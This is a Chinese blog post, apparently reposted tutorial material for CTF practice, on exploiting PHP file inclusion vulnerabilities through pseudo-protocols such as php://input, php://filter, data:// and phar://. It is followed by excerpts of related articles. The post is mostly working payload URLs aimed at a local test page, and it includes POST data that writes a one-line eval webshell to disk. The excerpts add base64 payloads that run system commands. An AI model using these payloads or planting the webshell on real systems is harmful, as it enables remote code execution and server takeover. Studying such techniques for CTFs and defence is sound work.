文件包含

最新推荐文章于 2024-01-11 12:19:31 发布
最新推荐文章于 2024-01-11 12:19:31 发布
阅读量133 收藏
点赞数
原文链接:https://www.freebuf.com/column/148886.html
版权

file:// 协议

include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。
file://[文件的绝对路径和文件名]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
在这里插入图片描述

[文件的相对路径和文件名]
http://127.0.0.1/include.php?file=./phpinfo.txt
在这里插入图片描述

php:// 协议
作用:
php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)

php://input + [POST DATA]执行php代码

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]

<?php phpinfo(); ?>

若有写入权限,写入一句话木马

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]

<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

data:// 协议
data://text/plain,
data://text/plain;base64,

data://text/plain,

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
在这里插入图片描述

data://text/plain;base64,

http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
在这里插入图片描述
http:// & https:// 协议

作用:常规 URL 形式,允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源。CTF中通常用于远程包含。
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
在这里插入图片描述
phar:// 协议
phar://协议与zip://类似,同样可以访问zip格式压缩包内容,在这里只给出一个示例:

http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt

https://segmentfault.com/a/1190000018991087

https://www.freebuf.com/column/148886.html

王俊凯迷妹
关注
File Inclusion(文件包含
kid的博客
04-16 3155
File Inclusion 前言 我觉得还是先介绍下,因为涉及到php函数,自己不会 世界最好的语言 ,所以引用他人的优秀的博客来装饰下我这简陋的博客 文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require...
文件包含(File inclusion)
最新发布
Cc040909的博客
08-23 1117
可以包含服务器本地文件,在条件允许时甚至能执行代码 读敏感文件,读PHP文件 包含日志文件GetShell 包含data:或php://input等伪协议 若有phpinfo则可以包含临时文件 配合上传图片马,然后包含从而GetShell。php://filter:通过过滤器来读取文件(php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码)(针对php文件需要base64编码)http://127.0.0.1/include.php?
细说文件包含
LainWith的博客
08-24 1549
目录什么是文件包含脑图本地包含无限制的文件包含有限制的文件包含远程文件包含开启远程文件包含有限制的文件包含伪协议PHP支持的伪协议php.ini参数设置各协议的利用条件和方法一些案例读取文件源码执行php代码写入一句话木马​`PHP://input`伪协议远程包含拿shell参考 什么是文件包含 以常见的php文件包含来说:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当作PHP来执行,这会为开发者节省大量的时间。但是,如果文件包含函数加载的参数没有经过过滤或者严格的定义,可
网安入门14-文件包含(file:// )
m0_61499194的博客
01-11 1093
文件包含漏洞是指应用程序在加载文件时,允许用户控制被加载文件的名称,从而导致恶意代码的执行或敏感信息的泄露。本地文件包含漏洞(LFI):攻击者可以包含服务器本地的任意文件,包括系统文件、配置文件、数据库文件等。远程文件包含漏洞(RFI):攻击者可以包含远程服务器上的任意文件,包括其他网站的文件、恶意网站的文件等。执行任意代码:攻击者可以通过包含恶意的 PHP 脚本或其他可执行文件来执行任意代码,从而控制服务器。窃取敏感信息:攻击者可以通过包含包含敏感信息的文件来窃取用户的密码、信用卡信息等敏感信息。
文件包含漏洞-01】文件包含漏洞成因与其包含语句及其相关配置
cc
02-21 3061
tips:当服务器开启allow_url_include选项时,就可以通过php的某些特性函数[include(),require(),include_once(),require_once()]利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。,页面显示如下,可以看到在require语句界面,第一条require语句成功执行,但是第二条语句执行出错,显示警告,也出现报错致命错误,程序终止,导致后续 脚本无法执行!,网页显示如下,可以看到语句被成功执行!
文件包含漏洞
qq_52016943的博客
08-17 2610
文件包含漏洞
CTF之web学习记录 -- 文件包含
热门推荐
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
CTF文件包含
qq_45086218的博客
02-28 3307
文章目录php伪协议data伪协议日志文件session文件竞争死亡绕过base64编码绕过 本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞 php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php data伪协议 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxh
信息安全技术基础:本地文件包含漏洞.pptx
11-01
【信息安全技术基础:本地文件包含漏洞】 在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许...
c语言文件包含的作用,第10天C语言(09):文件包含-注意点
weixin_29650949的博客
05-16 114
一、概念/*#include """" 先会在当前文件查找, 找不到再去编译器环境下查找,找不到再去系统的环境下查找#include <><> 先去编译器环境下查找,找不到再去系统的环境下查找作用:将""或者<>中的内容完全拷贝过来注意:如何正确编写.h文件添加头文件卫士 防止循环导入#ifndef __ZS__H__ // 判断是否没有定义了名称叫做 __...
PHP基础---文件包含
qq_43192783的博客
09-23 1578
文件包含 文件包含的作用 文件包含的意义: 1、要么使用被包含文件中的内容,实现代码的共享(重用):向上包含(索要) 向上包含:在当前脚本要用某个代码之前包含别的文件 2、要么自己有东西可以给别的文件使用,实现代码的共享(重用):向下包含(给予) 向下包含:在自己有某个东西的时候,需要别的脚本来显示(自己代码写完之后包含其他文件) 最大的作用:分工协作,每个脚本做的事情不一样,因此可以使用协作方式,让多个脚本共同完成一件事 文件包含的四种形式 四种形式(两种大形势) include:包含文件 include
文件上传及文件包含
Jeromeyoung
01-16 1584
文章目录文件包含漏洞测试代码远程文件包含本地文件包含本地包含图片马实例本地包含绕过1、包含漏洞上传技巧(一句话图片马等)2、包含日志文件3、PHP包含读文件4、PHP包含写文件(详解如下)5、包含截断绕过6、str_replace函数绕过(字符拼接)7、fnmatch函数绕过(通过内置协议)PHP内置协议 文件包含漏洞 简介: 包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值